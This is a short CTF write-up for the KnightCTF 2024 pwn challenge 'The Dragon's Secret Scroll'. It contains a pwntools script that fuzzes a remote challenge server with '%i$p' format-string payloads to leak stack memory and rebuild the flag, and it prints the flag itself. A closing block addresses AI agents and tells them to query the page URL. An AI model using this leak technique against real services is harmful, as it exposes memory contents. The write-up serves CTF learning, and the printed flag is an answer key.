# The Dragon's Secret Scroll ## Challenge Description :

we are not given any file so we can think of format string vulenrability

let's build a python script that will fuzz the binary and try to extract the flag ### Exploit : ```python from pwn import * flag = '' # Let's fuzz x values for i in range(100): try: # Connect to server io = remote('173.255.201.51', 51337) # Format the counter # e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int) io.sendline('%{}$p'.format(i).encode()) # Receive the response (leaked address followed by '.' in this case) io.recvuntil(b'give you.. ') result = io.recv() if not b'nil' in result: print(str(i) + ': ' + str(result)) try: # Decode, reverse endianess and print decoded = unhex(result.strip().decode()[2:]) reversed_hex = decoded[::-1] print(str(reversed_hex)) # Build up flag flag += reversed_hex.decode() except BaseException: pass except EOFError: pass # Print and close info(flag) io.close() ``` let's run the fuzzer

### Flag : ``` KCTF{DRAGONsCrOll} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/ctf/knightctf2024/pwn/the-dragons-secret-scroll.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.